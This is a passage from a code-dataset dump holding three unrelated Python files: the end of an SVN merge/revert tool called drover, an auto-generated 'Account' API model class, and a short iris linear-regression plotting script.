  NO_ALT_URLS = options.no_alt_urls
  DEFAULT_WORKING = "drover_" + str(revision)
  if options.branch:
    DEFAULT_WORKING += ("_" + options.branch)
  if not isMinimumSVNVersion(1, 5):
    print "You need to use at least SVN version 1.5.x"
    return 1
  # Override the default properties if there is a drover.properties file.
  global file_pattern_
  if os.path.exists("drover.properties"):
    print 'Using options from %s' % os.path.join(
        os.getcwd(), 'drover.properties')
    FILE_PATTERN = file_pattern_
    f = open("drover.properties")
    exec(f)
    f.close()
    if FILE_PATTERN:
      file_pattern_ = FILE_PATTERN
    NO_ALT_URLS = True
  # Pick the source URL for the operation.
  if options.revert and options.branch:
    print 'Note: --branch is usually not needed for reverts.'
    url = BRANCH_URL.replace("$branch", options.branch)
  elif options.merge and options.sbranch:
    url = BRANCH_URL.replace("$branch", options.sbranch)
  elif options.revert:
    url = options.url or BASE_URL
    file_pattern_ = r"[ ]+([MADUC])[ ]+((/.*)/(.*))"
  else:
    url = TRUNK_URL
  working = options.workdir or DEFAULT_WORKING
  if options.local:
    working = os.getcwd()
    if not inCheckoutRoot(working):
      print "'%s' appears not to be the root of a working copy" % working
      return 1
    if (isSVNDirty() and not
        prompt("Working copy contains uncommitted files. Continue?")):
      return 1
  # Heuristic: for reverts without an explicit URL, probe alternate repos for
  # one where the revision is recent (changed within ~6 months).
  if options.revert and not NO_ALT_URLS and not options.url:
    for cur_url in [url] + REVERT_ALT_URLS:
      try:
        commit_date_str = getSVNInfo(
            cur_url, options.revert).get('Last Changed Date', 'x').split()[0]
        commit_date = datetime.datetime.strptime(commit_date_str, '%Y-%m-%d')
        if (datetime.datetime.now() - commit_date).days < 180:
          if cur_url != url:
            print 'Guessing svn repo: %s.' % cur_url,
            print 'Use --no-alt-urls to disable heuristic.'
            url = cur_url
          break
      except ValueError:
        pass
  command = 'svn log ' + url + " -r "+str(revision) + " -v"
  os.system(command)
  if not (options.revertbot or prompt("Is this the correct revision?")):
    return 0
  if (os.path.exists(working)) and not options.local:
    if not (options.revertbot or SKIP_CHECK_WORKING or
            prompt("Working directory: '%s' already exists, clobber?" % working)):
      return 0
    gclient_utils.rmtree(working)
  if not options.local:
    os.makedirs(working)
    os.chdir(working)
  if options.merge:
    action = "Merge"
    if not options.local:
      branch_url = BRANCH_URL.replace("$branch", options.branch)
      # Checkout everything but stuff that got added into a new dir
      checkoutRevision(url, revision, branch_url)
    # Merge everything that changed
    mergeRevision(url, revision)
    # "Export" files that were added from the source and add them to branch
    exportRevision(url, revision)
    # Delete directories that were deleted (file deletes are handled in the
    # merge).
    deleteRevision(url, revision)
  elif options.revert:
    action = "Revert"
    pop_em = not options.url
    checkoutRevision(url, revision, url, True, pop_em)
    revertRevision(url, revision)
    revertExportRevision(url, revision)
  # Check the base url so we actually find the author who made the change
  if options.auditor:
    author = options.auditor
  else:
    author = getAuthor(url, revision)
    if not author:
      author = getAuthor(TRUNK_URL, revision)
  # Check that the author of the CL is different than the user making
  # the revert. If they're the same, then we'll want to prompt the user
  # for a different reviewer to TBR.
  current_users = getCurrentSVNUsers(BASE_URL)
  is_self_revert = options.revert and author in current_users
  # Write the change description: title, quoted original log, TBR line.
  filename = str(revision)+".txt"
  out = open(filename,"w")
  drover_title = '%s %s' % (action, revision)
  revision_log = getRevisionLog(url, revision).splitlines()
  if revision_log:
    commit_title = revision_log[0]
    # Limit title to 68 chars so git log --oneline is <80 chars.
    max_commit_title = 68 - (len(drover_title) + 3)
    if len(commit_title) > max_commit_title:
      commit_title = commit_title[:max_commit_title-3] + '...'
    drover_title += ' "%s"' % commit_title
  out.write(drover_title + '\n\n')
  for line in revision_log:
    out.write('> %s\n' % line)
  if author:
    out.write("\nTBR=" + author)
  out.close()
  change_cmd = 'change ' + str(revision) + " " + filename
  if options.revertbot:
    # Suppress the interactive editor when running unattended.
    if sys.platform == 'win32':
      os.environ['SVN_EDITOR'] = 'cmd.exe /c exit'
    else:
      os.environ['SVN_EDITOR'] = 'true'
  runGcl(change_cmd)
  os.unlink(filename)
  if options.local:
    return 0
  print author
  print revision
  print ("gcl upload " + str(revision) +
         " --send_mail --no_presubmit --reviewers=" + author)
  if options.revertbot or prompt("Would you like to upload?"):
    if PROMPT_FOR_AUTHOR or is_self_revert:
      author = text_prompt("Enter new author or press enter to accept default",
                           author)
    if options.revertbot and options.revertbot_reviewers:
      author += ","
      author += options.revertbot_reviewers
    gclUpload(revision, author)
  else:
    print "Deleting the changelist."
    print "gcl delete " + str(revision)
    runGcl("delete " + str(revision))
    return 0
  # We commit if the reverbot is set to commit automatically, or if this is
  # not the revertbot and the user agrees.
  if options.revertbot_commit or (not options.revertbot and
                                  prompt("Would you like to commit?")):
    print "gcl commit " + str(revision) + " --no_presubmit --force"
    return runGcl("commit " + str(revision) + " --no_presubmit --force")
  else:
    return 0
def main():
  """Parse command-line flags, validate flag combinations and run drover()."""
  parser = optparse.OptionParser(usage=USAGE % {"app": sys.argv[0]})
  parser.add_option('-m', '--merge', type="int",
                    help='Revision to merge from trunk to branch')
  parser.add_option('-b', '--branch',
                    help='Branch to revert or merge from')
  parser.add_option('-l', '--local', action='store_true',
                    help='Local working copy to merge to')
  parser.add_option('-s', '--sbranch',
                    help='Source branch for merge')
  parser.add_option('-r', '--revert', type="int",
                    help='Revision to revert')
  parser.add_option('-w', '--workdir',
                    help='subdir to use for the revert')
  parser.add_option('-u', '--url',
                    help='svn url to use for the revert')
  parser.add_option('-a', '--auditor',
                    help='overrides the author for reviewer')
  parser.add_option('--revertbot', action='store_true',
                    default=False)
  parser.add_option('--no-alt-urls', action='store_true',
                    help='Disable heuristics used to determine svn url')
  parser.add_option('--revertbot-commit', action='store_true',
                    default=False)
  parser.add_option('--revertbot-reviewers')
  options, args = parser.parse_args()
  # Flag-combination sanity checks; parser.error() prints usage and exits.
  if not options.merge and not options.revert:
    parser.error("You need at least --merge or --revert")
    return 1
  if options.merge and not (options.branch or options.local):
    parser.error("--merge requires --branch or --local")
    return 1
  if options.local and (options.revert or options.branch):
    parser.error("--local cannot be used with --revert or --branch")
    return 1
  return drover(options, args)
if __name__ == "__main__":
  try:
    sys.exit(main())
  except KeyboardInterrupt:
    # Exit quietly with status 1 on Ctrl-C instead of dumping a traceback.
    sys.stderr.write('interrupted\n')
    sys.exit(1)
|
python
|
# -*- coding: utf-8 -*-
"""
MagicTelecomAPILib.Models.Account
This file was automatically generated by APIMATIC v2.0 on 06/22/2016
"""
from MagicTelecomAPILib.APIHelper import APIHelper
class Account(object):
    """Implementation of the 'Account' model.

    Attributes:
        number (string): account number.
        roles (list of string): roles granted to the account.
        email (string): contact e-mail address.
        contact_number (string): contact phone number.
        firstname (string): first name of the account holder.
        lastname (string): last name of the account holder.
    """

    # Single mapping between API property names and model attribute names.
    # (The names coincide for this model; previously this dict was duplicated
    # verbatim in both __init__ and resolve_names.)
    _replace_names = {
        "number": "number",
        "roles": "roles",
        "email": "email",
        "contact_number": "contact_number",
        "firstname": "firstname",
        "lastname": "lastname",
    }

    def __init__(self,
                 **kwargs):
        """Constructor for the Account class.

        Args:
            **kwargs: any of the attributes documented on the class may be
                supplied as keyword arguments; keys that are not part of the
                model are silently ignored.
        """
        # Set all of the parameters to their default values
        self.number = None
        self.roles = None
        self.email = None
        self.contact_number = None
        self.firstname = None
        self.lastname = None
        # Only adopt arguments that are actually part of this object
        # (kwargs is always a dict, so no None check is needed).
        for key, value in kwargs.items():
            if key in self._replace_names:
                setattr(self, self._replace_names[key], value)

    def resolve_names(self):
        """Creates a dictionary representation of this object.

        This method converts an object to a dictionary that represents the
        format that the model should be in when passed into an API Request.
        Because of this, the generated dictionary may have different
        property names to that of the model itself.

        Returns:
            dict: The dictionary representing the object.
        """
        return APIHelper.resolve_names(self, self._replace_names, dict())
|
python
|
# Linear regression on iris dataset
import numpy as np
import matplotlib.pyplot as plt
import os

# Figures are written under $PYPROBML/figures
figdir = os.path.join(os.environ["PYPROBML"], "figures")


def save_fig(fname):
    plt.savefig(os.path.join(figdir, fname))


import seaborn as sns
from sklearn.linear_model import LinearRegression
from sklearn import datasets

iris = datasets.load_iris()
feature_idx = 2  # predictor column

# Fit and plot a separate regression for each of two target columns.
for target_idx in [1, 3]:
    X = iris.data[:, feature_idx:feature_idx + 1]
    Y = iris.data[:, target_idx:target_idx + 1]
    model = LinearRegression()
    model.fit(X, Y)
    grid = np.arange(np.min(X), np.max(X), 0.1).reshape(-1, 1)
    predictions = model.predict(grid)
    plt.plot(grid, predictions)
    sns.scatterplot(x=X[:, 0], y=Y[:, 0])
    plt.xlabel(iris.feature_names[feature_idx])
    plt.ylabel(iris.feature_names[target_idx])
    plt.xlim(np.min(X), np.max(X))
    plt.ylim(np.min(Y), np.max(Y))
    save_fig("iris-linreg{}".format(target_idx))
    plt.show()
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.